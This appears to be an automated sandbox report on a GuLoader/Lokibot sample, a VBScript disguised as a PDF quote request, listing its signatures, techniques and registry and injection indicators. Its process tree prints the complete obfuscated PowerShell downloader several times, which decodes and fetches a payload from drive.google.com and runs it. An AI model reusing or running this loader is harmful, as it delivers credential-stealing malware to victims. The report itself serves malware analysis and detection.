guloader | 24bbc0768eee5c4f4d6c3d199295009fb24d285e8f3cec509b755de4c25e8c80

Analysis

max time kernel
142s
max time network
137s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
17-09-2024 14:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Solicitud De Presupuesto 09-16-2024·pdf.vbs
Size

37KB
MD5

2f3b50537c5d1377ac4dfd11e3b0e9da
SHA1

003bd5a1d5cdc1b68ae1429e38a64a713e6ccc71
SHA256

24bbc0768eee5c4f4d6c3d199295009fb24d285e8f3cec509b755de4c25e8c80
SHA512

b04cf4da54fb02125bfaf4ff7b7342d47ccafc9d7073a9d97169503fd0fcc2cdff93b04de6ca1a953fa12fb842cf2a6d44d7e9ca220eb7ca50ec02b05dec2dc4
SSDEEP

384:Z9vOg3rNR7SuYXMr0PAayFLPlkOCnEfA8BFg8e3StKqo/tv0yxJHqMUaYQ3K:Zp3rNhvrwgdlkXw//tK7/x7Yz

Score

10^/10

guloader lokibot collection credential_access discovery downloader spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 2 IoCs

flow	pid	Process
11	2328	powershell.exe
16	2328	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	ImagingDevices.exe
Key opened	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	ImagingDevices.exe
Key opened	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	ImagingDevices.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
11	drive.google.com
28	drive.google.com
9	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2352	ImagingDevices.exe
2352	ImagingDevices.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1448	powershell.exe
2352	ImagingDevices.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1448 set thread context of 2352	1448	powershell.exe	117

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ImagingDevices.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2328	powershell.exe
2328	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe

Suspicious behavior: MapViewOfSection 22 IoCs

pid	Process
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	1448	powershell.exe
Token: SeDebugPrivilege	2352	ImagingDevices.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4332 wrote to memory of 2328	4332	WScript.exe	83
PID 4332 wrote to memory of 2328	4332	WScript.exe	83
PID 2328 wrote to memory of 1856	2328	powershell.exe	85
PID 2328 wrote to memory of 1856	2328	powershell.exe	85
PID 2328 wrote to memory of 1048	2328	powershell.exe	91
PID 2328 wrote to memory of 1048	2328	powershell.exe	91
PID 1048 wrote to memory of 1448	1048	cmd.exe	92
PID 1048 wrote to memory of 1448	1048	cmd.exe	92
PID 1048 wrote to memory of 1448	1048	cmd.exe	92
PID 1448 wrote to memory of 4600	1448	powershell.exe	95
PID 1448 wrote to memory of 4600	1448	powershell.exe	95
PID 1448 wrote to memory of 4600	1448	powershell.exe	95
PID 1448 wrote to memory of 1640	1448	powershell.exe	96
PID 1448 wrote to memory of 1640	1448	powershell.exe	96
PID 1448 wrote to memory of 1640	1448	powershell.exe	96
PID 1448 wrote to memory of 4896	1448	powershell.exe	97
PID 1448 wrote to memory of 4896	1448	powershell.exe	97
PID 1448 wrote to memory of 4896	1448	powershell.exe	97
PID 1448 wrote to memory of 4276	1448	powershell.exe	98
PID 1448 wrote to memory of 4276	1448	powershell.exe	98
PID 1448 wrote to memory of 4276	1448	powershell.exe	98
PID 1448 wrote to memory of 2036	1448	powershell.exe	99
PID 1448 wrote to memory of 2036	1448	powershell.exe	99
PID 1448 wrote to memory of 2036	1448	powershell.exe	99
PID 1448 wrote to memory of 4924	1448	powershell.exe	100
PID 1448 wrote to memory of 4924	1448	powershell.exe	100
PID 1448 wrote to memory of 4924	1448	powershell.exe	100
PID 1448 wrote to memory of 5080	1448	powershell.exe	101
PID 1448 wrote to memory of 5080	1448	powershell.exe	101
PID 1448 wrote to memory of 5080	1448	powershell.exe	101
PID 1448 wrote to memory of 60	1448	powershell.exe	102
PID 1448 wrote to memory of 60	1448	powershell.exe	102
PID 1448 wrote to memory of 60	1448	powershell.exe	102
PID 1448 wrote to memory of 2224	1448	powershell.exe	103
PID 1448 wrote to memory of 2224	1448	powershell.exe	103
PID 1448 wrote to memory of 2224	1448	powershell.exe	103
PID 1448 wrote to memory of 4320	1448	powershell.exe	104
PID 1448 wrote to memory of 4320	1448	powershell.exe	104
PID 1448 wrote to memory of 4320	1448	powershell.exe	104
PID 1448 wrote to memory of 3152	1448	powershell.exe	105
PID 1448 wrote to memory of 3152	1448	powershell.exe	105
PID 1448 wrote to memory of 3152	1448	powershell.exe	105
PID 1448 wrote to memory of 4684	1448	powershell.exe	106
PID 1448 wrote to memory of 4684	1448	powershell.exe	106
PID 1448 wrote to memory of 4684	1448	powershell.exe	106
PID 1448 wrote to memory of 2604	1448	powershell.exe	107
PID 1448 wrote to memory of 2604	1448	powershell.exe	107
PID 1448 wrote to memory of 2604	1448	powershell.exe	107
PID 1448 wrote to memory of 1572	1448	powershell.exe	108
PID 1448 wrote to memory of 1572	1448	powershell.exe	108
PID 1448 wrote to memory of 1572	1448	powershell.exe	108
PID 1448 wrote to memory of 1800	1448	powershell.exe	109
PID 1448 wrote to memory of 1800	1448	powershell.exe	109
PID 1448 wrote to memory of 1800	1448	powershell.exe	109
PID 1448 wrote to memory of 5104	1448	powershell.exe	110
PID 1448 wrote to memory of 5104	1448	powershell.exe	110
PID 1448 wrote to memory of 5104	1448	powershell.exe	110
PID 1448 wrote to memory of 4916	1448	powershell.exe	111
PID 1448 wrote to memory of 4916	1448	powershell.exe	111
PID 1448 wrote to memory of 4916	1448	powershell.exe	111
PID 1448 wrote to memory of 3776	1448	powershell.exe	112
PID 1448 wrote to memory of 3776	1448	powershell.exe	112
PID 1448 wrote to memory of 3776	1448	powershell.exe	112
PID 1448 wrote to memory of 732	1448	powershell.exe	113

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	ImagingDevices.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	ImagingDevices.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Solicitud De Presupuesto 09-16-2024·pdf.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Desorganiseredes Pyramideselskab Tjenestevogne Silkesommerfugles #>;$Krogster='Esdragons';<#Repellant Telephonical Islamize Nierens Terrazzo #>;$Corintha=$host.PrivateData;If ($Corintha) {$Allopathically201++;}function benignant($Sopransaxofonernes43){$Disponibel237=$Sopransaxofonernes43.Length-$Allopathically201;for( $Lettende=5;$Lettende -lt $Disponibel237;$Lettende+=6){$Amtshospitalet+=$Sopransaxofonernes43[$Lettende];}$Amtshospitalet;}function Illuminate($Billiggres){ . ($Rewriting) ($Billiggres);}$Kolonneformats=benignant 'FolkeM Nym.opostpzBu uni CololorbiclIdioca abel/ Prot5Ap.ea.Nonim0Ovi.o Dagg (.koldWm ksii Ant.n BraddBaluso nstywCo,kasKad.g ,erstNDistaTCur,i Outsm1Lie,t0skudv.Bj.in0Angul;trlgn tepaWUdkraiHe epnSulte6Skruk4Illum;Outji Haa dxBobbi6 Frem4 atel;Rever BlairrTilbavInstr:Overk1D,eli2 Illa1 Holo.Stick0 Smin) obbe BellyG RemaeOmnorcAvlinkSadomoKontr/Ferti2Angst0uncas1 Mi,g0forpl0 Hume1spge.0 aske1Viki, GulerFbetraiBkkenrR sureUngdofSaturosynsixNa ur/Undga1bar,t2Therm1 D ce.Kamme0Tapre ';$Extensional=benignant 'TrreruAfskaSAltitedisfarCount-SandwaYean.gDisauEstrepnP nsutN,kro ';$Sympathising=benignant 'Betokh Dvrgt L.gwt PolepOejens V.lu:vorac/Myela/T eeddP,ecarKvartiDr,itvTho.seMouss.Andrug ProdoeuthaoskiftgSurhelRend.eAvert.SeawecPlu boInburm Biks/NeminuSleekcSkade?Arr seKanalxMidstpKon po cyklrHu kotTen e=AgathdStadso Bellw nemn kriglStetsoRetinaSkelsdmonni&Antiqi SheddIndls= Tite1 Sept1 Bensb notfYVillauDem,bWDe urRA fgasLydig1platiL tpa_ PagawSkrmmOAtricpOrlo PFradrqspareqElegiqSe.tenOs meBHel e2tagdk1Vaads7UnmoriFamesq Induq BolszEgoceWAffalaScorpASeman5 Navn7 Supe6Fljet ';$Somberly=benignant 'R,con>Svine ';$Rewriting=benignant 'Sger.ISpeirE podoxMasse ';$argusblikkenes='Seeress';$skrvebetonerne = benignant 'dagpaeNaur.cDura.h arifoBlaap skrin%Mond,a,repppEkspepBlackdTransa intt Vella mona%A.tin\ detaPO hreoForeclantifyMeninpch orhAffalojo rnbMotoriLokuma nuti.rallecSvimlhScopor Cher Klokk&Isopa&tanks Amy oeSoltrcHoflehBruseoPr co Over,tFuppe ';Illuminate (benignant 'Aircr$SkrumgSanselRegeno Vamob h nka DemolSmelt:FogleJFortioTripuuInte rExpednInc ia K mnlPara.iTilsmsUnappewishbrConfee Naugn AricdErotoeT lst=Unm s(RyotscB,achmGlacid Varm Udpan/AnkomcPlump Decli$F ingspassikOrthor An tvWheyseNoncobD.tabeUndertRoul,oDemilnAcci eSuperr kelenExtraeSpild)St,rs ');Illuminate (benignant 'Farin$BetjegFelo.lFors oGevrkbWife aSubtrlTolkn:FilmeHAtwiroFolsomO yceoUltraioverroAdvaruOs,eosSammeiSc.weaVaricnEks.a=Bisam$Bit eS Modey Anc mmi impReperaBystyt Su ehTrevliCaphisMrkvri N genEgotrgU sti. bibls Ory p KraflSubmaigraphtDusse(Sashe$ Mo fSa chooL.nirm lsgrb arneeOverbrMurrslAdelsydanma)Maldi ');Illuminate (benignant 'Karto[Ursk NAtombeS ntit Ned .Alie.SFradre BlehrSyva,vMezaiiOvertcAlligeGrim,PWauchoWhangiP,olenper otSelvhMEgbata unden lskva an,egStosheBryggrImmor]Forha:kod i:Ti.reSDdirreUpflac Phenu Balsr PolyiPr,mit obbeyTeamaPKsendrReap,o randtMnt,eo paltcRett oZealolGless Usvig=Fore Subga[DipnoNEpiple WalltPorce.Afle,S BianeFrottcEternu .uggr.kmtei Allet atmyPens PUniqurForm oUdkketDiseno OligcCineaoEsocilVi ifT SkriyO.erbpWincheBeco.]Rembo:p.esb: ,ickTClauslPel isFildi1Firel2raadg ');$Sympathising=$Homoiousian[0];$Tewing= (benignant 'Hunde$Prelig ,ntilAntidoGenerBComp ATil,tl Ste,:,andsHtetraoVulcaMKrafto T,arNRestsYforfrMunitee poreSTrac = Kaf N B vaEIn erWSheet-Indt O ,odkBBedrijPo teENytaaCAnkehTAgter Hunchsthe.ryForhiSputtaTHave,eBug.pm Yeel.Muz rnByboee CabaTTalep.StormwTrkloE uverbIsog CSpeciLbl myi FaneEMerlon agrat');$Tewing+=$Journaliserende[1];Illuminate ($Tewing);Illuminate (benignant ' Fi a$HornbH FlatoCo ubmForhaoSupern Tegnyeyep mBlikdetnd msSkaal. apilH Evene hecka flstdafsineD pkorJord,sProse[ Misu$chasiETaccaxSprint ynsmeH poan Kel s alici HalooAmicanFi fia redlS.eri]Dawsp=Brneb$ Hie KSuperoHol glAsymmoTilesnHea.en UnhueMela fChadooSk dur F ulmothe aRorpitSi.hos Esco ');$Sensationelt=benignant 'Br,ge$ Mi rHFdr loB,awsmTagetoIsbryn MyteyCromlmcatcheForsaspriv,. SupeD GrinoAp stwFadernBefollFjer oGygesaArtildLeje,FOvermiEnervlUndgaeNati.( O,er$HysteSArea,ySpinamUnaffpNaetha e oit monghResbeiFemogsstr,pi HvornBravagStrik,perse$LrkerT Ramsa ecilCarbokSoliciSup rn Pe cgSvovl)Isdes ';$Talking=$Journaliserende[0];Illuminate (benignant ' aafe$HielaGS igelSh ieoD,monB Minea vet LB rgo:VldedtNou.eAEx anl Platl edbaSExacteBogfiSM lli=K pre(Thi,ut sek,ECourtSStemmtpurre-WritePDatosAReoleTU,ivah Bru Elvr$Hya,ot consaAtlanLSkolekRgto,iProgrnimmung.dluf)Lufth ');while (!$Tallses) {Illuminate (benignant 'Erst $traf,gAmo il ehebouns,obIgraiaChinqlMunds:MokkaHEnr,boSub bbStyggeadsti=Skriv$Acr.ntEmpowr .alcuKuf,yeEll t ') ;Illuminate $Sensationelt;Illuminate (benignant 'TermiSPhalatSkidtaHeterrMercitBusga- Bo mSFire lLiguseSpasmeLowripwight Spl 4 ,elt ');Illuminate (benignant ' Juba$SnydegMintmlNemo,oSub ubShil,a s ltlMicro:PhasiTG ecia issolAnnihlInseqsPrehyeD ynasKonkr=Unsta( all,TMalade.raves ntictFrugt- EighPYamaha tontS roghk ige Resil$HrderT Traba PolylArtikk luksi ResonUde ogdybtr)S,ive ') ;Illuminate (benignant 'Tren.$eftergAna.tlHenveoCluppbSva.taTermilUdvok:HaandESmr ecUns ic UnadlCopro=Udbrn$ De,tg Sr elHjtidoNabovbAds rateks lMenuk:OverwBSkyenu Gra n Is skZe ue+Idole+ Band%Unrue$I,tfaHInstroHummemNaunto AfskiDimoloAflveuSansesIglooiMedi.aSnd rnSinog.Budg cSalvio.lankuForgrnVestetIndav ') ;$Sympathising=$Homoiousian[$Eccl];}$Pariasaurus=286978;$drumheads=29373;Illuminate (benignant 'Strum$ ircugFugitl Elpro Skilbbant aUn,unlakkor:ma,gfFTsader ReveeOddsee verrlFeereo,lattaMinimdKn cke kulsdPsyke Venst=Jehus Pr,buG AppeeAngivtSpect-fagk C Z,dloCu icnOverptUnde eFlnsen onsatPe rl Stran$Iden,TsphenaBibetlBl etkSubcuiLvensnSkuffg Ty o ');Illuminate (benignant 'Te ri$OpkasgGlycol andioCuckqbEncepaBirkelSkema: Su,uDSyncheMonishChattysynondflyverDesigoTeolog Indhe gambnspecia CapttLame,eReforseksek Sigtn= eobj Skrif[ BephSGedebyUdspisK nemtJeaneeNightmBehan.FolkeC VedioBarben Paa v okose Unorrdiamat ump] Leuc:Uover: mhttFDa bcrtrimpo ,agemPhyllBGumwoa ntrsT.alpeRevan6Stjyl4 FuseS .roetDatabr Dan iAbonnn GrizgSolso( ndes$ForbiFseriorrddikeTele eKurvfl,likkoAsfreaLyco dKnatte Gidsds rec)Nedri ');Illuminate (benignant 'Stret$DrikkgIna,gl Chamo ThunbTapl aTi hel Flym: EvneMU pinoFodsvn AutoaMedbesZulubtimpreeCru,brUnfraiRun sa IntelskimmlStokry.demo myt,l=Pseud Shera[unadoSA timyPr ntsCaseltKuvereScreemTryki.R,gneTFir ee eillxcypritSk.ve.SallyE atinTortucUnderoMikr d Dea iL.tmenJellig Over]Indbi:Achen:Inve,ACome SPlutoCTankeISmi eI Pjat.AfledGTil ne PlustFalkoS.ontrtDilapr ntesiin ldn kvalgButan( Bunk$ ClifDTropaeSkaanh SoleyAmanudFyldnrUnderoSlaskgExotieCryptnAntigaoverpt Ved eSllersD ase)Skrum ');Illuminate (benignant 'Spist$HomoggFusspltilskoBoundbDurabaSnufflHplas:Ka muE FraglSpectoMavefrFor igWhik,lS,tsseSkattt InulsAfskr= Maes$SidesMIntrao enannCykelaStikpsUdfldtTow.leRestirMegatiUvanea.esorl Selvlarbe.yUndet.Wit,asSem nuFlag bCen tsAdenot AargrTanghiLangsnFortjgDupli( Ko v$MetodP Pr,ba vulrLngodiYndliaEnsbesM kniaSubdeu Ko fr AftruB agusPrisf, Akk $Tortud.verfr.purguR.dskmNozz.hFjerteAerifaStomad.rbejsTapn,) Vrdi ');Illuminate $Elorglets;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2328
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Polyphobia.chr && echo t"
    3⤵
    PID:1856
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Desorganiseredes Pyramideselskab Tjenestevogne Silkesommerfugles #>;$Krogster='Esdragons';<#Repellant Telephonical Islamize Nierens Terrazzo #>;$Corintha=$host.PrivateData;If ($Corintha) {$Allopathically201++;}function benignant($Sopransaxofonernes43){$Disponibel237=$Sopransaxofonernes43.Length-$Allopathically201;for( $Lettende=5;$Lettende -lt $Disponibel237;$Lettende+=6){$Amtshospitalet+=$Sopransaxofonernes43[$Lettende];}$Amtshospitalet;}function Illuminate($Billiggres){ . ($Rewriting) ($Billiggres);}$Kolonneformats=benignant 'FolkeM Nym.opostpzBu uni CololorbiclIdioca abel/ Prot5Ap.ea.Nonim0Ovi.o Dagg (.koldWm ksii Ant.n BraddBaluso nstywCo,kasKad.g ,erstNDistaTCur,i Outsm1Lie,t0skudv.Bj.in0Angul;trlgn tepaWUdkraiHe epnSulte6Skruk4Illum;Outji Haa dxBobbi6 Frem4 atel;Rever BlairrTilbavInstr:Overk1D,eli2 Illa1 Holo.Stick0 Smin) obbe BellyG RemaeOmnorcAvlinkSadomoKontr/Ferti2Angst0uncas1 Mi,g0forpl0 Hume1spge.0 aske1Viki, GulerFbetraiBkkenrR sureUngdofSaturosynsixNa ur/Undga1bar,t2Therm1 D ce.Kamme0Tapre ';$Extensional=benignant 'TrreruAfskaSAltitedisfarCount-SandwaYean.gDisauEstrepnP nsutN,kro ';$Sympathising=benignant 'Betokh Dvrgt L.gwt PolepOejens V.lu:vorac/Myela/T eeddP,ecarKvartiDr,itvTho.seMouss.Andrug ProdoeuthaoskiftgSurhelRend.eAvert.SeawecPlu boInburm Biks/NeminuSleekcSkade?Arr seKanalxMidstpKon po cyklrHu kotTen e=AgathdStadso Bellw nemn kriglStetsoRetinaSkelsdmonni&Antiqi SheddIndls= Tite1 Sept1 Bensb notfYVillauDem,bWDe urRA fgasLydig1platiL tpa_ PagawSkrmmOAtricpOrlo PFradrqspareqElegiqSe.tenOs meBHel e2tagdk1Vaads7UnmoriFamesq Induq BolszEgoceWAffalaScorpASeman5 Navn7 Supe6Fljet ';$Somberly=benignant 'R,con>Svine ';$Rewriting=benignant 'Sger.ISpeirE podoxMasse ';$argusblikkenes='Seeress';$skrvebetonerne = benignant 'dagpaeNaur.cDura.h arifoBlaap skrin%Mond,a,repppEkspepBlackdTransa intt Vella mona%A.tin\ detaPO hreoForeclantifyMeninpch orhAffalojo rnbMotoriLokuma nuti.rallecSvimlhScopor Cher Klokk&Isopa&tanks Amy oeSoltrcHoflehBruseoPr co Over,tFuppe ';Illuminate (benignant 'Aircr$SkrumgSanselRegeno Vamob h nka DemolSmelt:FogleJFortioTripuuInte rExpednInc ia K mnlPara.iTilsmsUnappewishbrConfee Naugn AricdErotoeT lst=Unm s(RyotscB,achmGlacid Varm Udpan/AnkomcPlump Decli$F ingspassikOrthor An tvWheyseNoncobD.tabeUndertRoul,oDemilnAcci eSuperr kelenExtraeSpild)St,rs ');Illuminate (benignant 'Farin$BetjegFelo.lFors oGevrkbWife aSubtrlTolkn:FilmeHAtwiroFolsomO yceoUltraioverroAdvaruOs,eosSammeiSc.weaVaricnEks.a=Bisam$Bit eS Modey Anc mmi impReperaBystyt Su ehTrevliCaphisMrkvri N genEgotrgU sti. bibls Ory p KraflSubmaigraphtDusse(Sashe$ Mo fSa chooL.nirm lsgrb arneeOverbrMurrslAdelsydanma)Maldi ');Illuminate (benignant 'Karto[Ursk NAtombeS ntit Ned .Alie.SFradre BlehrSyva,vMezaiiOvertcAlligeGrim,PWauchoWhangiP,olenper otSelvhMEgbata unden lskva an,egStosheBryggrImmor]Forha:kod i:Ti.reSDdirreUpflac Phenu Balsr PolyiPr,mit obbeyTeamaPKsendrReap,o randtMnt,eo paltcRett oZealolGless Usvig=Fore Subga[DipnoNEpiple WalltPorce.Afle,S BianeFrottcEternu .uggr.kmtei Allet atmyPens PUniqurForm oUdkketDiseno OligcCineaoEsocilVi ifT SkriyO.erbpWincheBeco.]Rembo:p.esb: ,ickTClauslPel isFildi1Firel2raadg ');$Sympathising=$Homoiousian[0];$Tewing= (benignant 'Hunde$Prelig ,ntilAntidoGenerBComp ATil,tl Ste,:,andsHtetraoVulcaMKrafto T,arNRestsYforfrMunitee poreSTrac = Kaf N B vaEIn erWSheet-Indt O ,odkBBedrijPo teENytaaCAnkehTAgter Hunchsthe.ryForhiSputtaTHave,eBug.pm Yeel.Muz rnByboee CabaTTalep.StormwTrkloE uverbIsog CSpeciLbl myi FaneEMerlon agrat');$Tewing+=$Journaliserende[1];Illuminate ($Tewing);Illuminate (benignant ' Fi a$HornbH FlatoCo ubmForhaoSupern Tegnyeyep mBlikdetnd msSkaal. apilH Evene hecka flstdafsineD pkorJord,sProse[ Misu$chasiETaccaxSprint ynsmeH poan Kel s alici HalooAmicanFi fia redlS.eri]Dawsp=Brneb$ Hie KSuperoHol glAsymmoTilesnHea.en UnhueMela fChadooSk dur F ulmothe aRorpitSi.hos Esco ');$Sensationelt=benignant 'Br,ge$ Mi rHFdr loB,awsmTagetoIsbryn MyteyCromlmcatcheForsaspriv,. SupeD GrinoAp stwFadernBefollFjer oGygesaArtildLeje,FOvermiEnervlUndgaeNati.( O,er$HysteSArea,ySpinamUnaffpNaetha e oit monghResbeiFemogsstr,pi HvornBravagStrik,perse$LrkerT Ramsa ecilCarbokSoliciSup rn Pe cgSvovl)Isdes ';$Talking=$Journaliserende[0];Illuminate (benignant ' aafe$HielaGS igelSh ieoD,monB Minea vet LB rgo:VldedtNou.eAEx anl Platl edbaSExacteBogfiSM lli=K pre(Thi,ut sek,ECourtSStemmtpurre-WritePDatosAReoleTU,ivah Bru Elvr$Hya,ot consaAtlanLSkolekRgto,iProgrnimmung.dluf)Lufth ');while (!$Tallses) {Illuminate (benignant 'Erst $traf,gAmo il ehebouns,obIgraiaChinqlMunds:MokkaHEnr,boSub bbStyggeadsti=Skriv$Acr.ntEmpowr .alcuKuf,yeEll t ') ;Illuminate $Sensationelt;Illuminate (benignant 'TermiSPhalatSkidtaHeterrMercitBusga- Bo mSFire lLiguseSpasmeLowripwight Spl 4 ,elt ');Illuminate (benignant ' Juba$SnydegMintmlNemo,oSub ubShil,a s ltlMicro:PhasiTG ecia issolAnnihlInseqsPrehyeD ynasKonkr=Unsta( all,TMalade.raves ntictFrugt- EighPYamaha tontS roghk ige Resil$HrderT Traba PolylArtikk luksi ResonUde ogdybtr)S,ive ') ;Illuminate (benignant 'Tren.$eftergAna.tlHenveoCluppbSva.taTermilUdvok:HaandESmr ecUns ic UnadlCopro=Udbrn$ De,tg Sr elHjtidoNabovbAds rateks lMenuk:OverwBSkyenu Gra n Is skZe ue+Idole+ Band%Unrue$I,tfaHInstroHummemNaunto AfskiDimoloAflveuSansesIglooiMedi.aSnd rnSinog.Budg cSalvio.lankuForgrnVestetIndav ') ;$Sympathising=$Homoiousian[$Eccl];}$Pariasaurus=286978;$drumheads=29373;Illuminate (benignant 'Strum$ ircugFugitl Elpro Skilbbant aUn,unlakkor:ma,gfFTsader ReveeOddsee verrlFeereo,lattaMinimdKn cke kulsdPsyke Venst=Jehus Pr,buG AppeeAngivtSpect-fagk C Z,dloCu icnOverptUnde eFlnsen onsatPe rl Stran$Iden,TsphenaBibetlBl etkSubcuiLvensnSkuffg Ty o ');Illuminate (benignant 'Te ri$OpkasgGlycol andioCuckqbEncepaBirkelSkema: Su,uDSyncheMonishChattysynondflyverDesigoTeolog Indhe gambnspecia CapttLame,eReforseksek Sigtn= eobj Skrif[ BephSGedebyUdspisK nemtJeaneeNightmBehan.FolkeC VedioBarben Paa v okose Unorrdiamat ump] Leuc:Uover: mhttFDa bcrtrimpo ,agemPhyllBGumwoa ntrsT.alpeRevan6Stjyl4 FuseS .roetDatabr Dan iAbonnn GrizgSolso( ndes$ForbiFseriorrddikeTele eKurvfl,likkoAsfreaLyco dKnatte Gidsds rec)Nedri ');Illuminate (benignant 'Stret$DrikkgIna,gl Chamo ThunbTapl aTi hel Flym: EvneMU pinoFodsvn AutoaMedbesZulubtimpreeCru,brUnfraiRun sa IntelskimmlStokry.demo myt,l=Pseud Shera[unadoSA timyPr ntsCaseltKuvereScreemTryki.R,gneTFir ee eillxcypritSk.ve.SallyE atinTortucUnderoMikr d Dea iL.tmenJellig Over]Indbi:Achen:Inve,ACome SPlutoCTankeISmi eI Pjat.AfledGTil ne PlustFalkoS.ontrtDilapr ntesiin ldn kvalgButan( Bunk$ ClifDTropaeSkaanh SoleyAmanudFyldnrUnderoSlaskgExotieCryptnAntigaoverpt Ved eSllersD ase)Skrum ');Illuminate (benignant 'Spist$HomoggFusspltilskoBoundbDurabaSnufflHplas:Ka muE FraglSpectoMavefrFor igWhik,lS,tsseSkattt InulsAfskr= Maes$SidesMIntrao enannCykelaStikpsUdfldtTow.leRestirMegatiUvanea.esorl Selvlarbe.yUndet.Wit,asSem nuFlag bCen tsAdenot AargrTanghiLangsnFortjgDupli( Ko v$MetodP Pr,ba vulrLngodiYndliaEnsbesM kniaSubdeu Ko fr AftruB agusPrisf, Akk $Tortud.verfr.purguR.dskmNozz.hFjerteAerifaStomad.rbejsTapn,) Vrdi ');Illuminate $Elorglets;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1048
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Desorganiseredes Pyramideselskab Tjenestevogne Silkesommerfugles #>;$Krogster='Esdragons';<#Repellant Telephonical Islamize Nierens Terrazzo #>;$Corintha=$host.PrivateData;If ($Corintha) {$Allopathically201++;}function benignant($Sopransaxofonernes43){$Disponibel237=$Sopransaxofonernes43.Length-$Allopathically201;for( $Lettende=5;$Lettende -lt $Disponibel237;$Lettende+=6){$Amtshospitalet+=$Sopransaxofonernes43[$Lettende];}$Amtshospitalet;}function Illuminate($Billiggres){ . ($Rewriting) ($Billiggres);}$Kolonneformats=benignant 'FolkeM Nym.opostpzBu uni CololorbiclIdioca abel/ Prot5Ap.ea.Nonim0Ovi.o Dagg (.koldWm ksii Ant.n BraddBaluso nstywCo,kasKad.g ,erstNDistaTCur,i Outsm1Lie,t0skudv.Bj.in0Angul;trlgn tepaWUdkraiHe epnSulte6Skruk4Illum;Outji Haa dxBobbi6 Frem4 atel;Rever BlairrTilbavInstr:Overk1D,eli2 Illa1 Holo.Stick0 Smin) obbe BellyG RemaeOmnorcAvlinkSadomoKontr/Ferti2Angst0uncas1 Mi,g0forpl0 Hume1spge.0 aske1Viki, GulerFbetraiBkkenrR sureUngdofSaturosynsixNa ur/Undga1bar,t2Therm1 D ce.Kamme0Tapre ';$Extensional=benignant 'TrreruAfskaSAltitedisfarCount-SandwaYean.gDisauEstrepnP nsutN,kro ';$Sympathising=benignant 'Betokh Dvrgt L.gwt PolepOejens V.lu:vorac/Myela/T eeddP,ecarKvartiDr,itvTho.seMouss.Andrug ProdoeuthaoskiftgSurhelRend.eAvert.SeawecPlu boInburm Biks/NeminuSleekcSkade?Arr seKanalxMidstpKon po 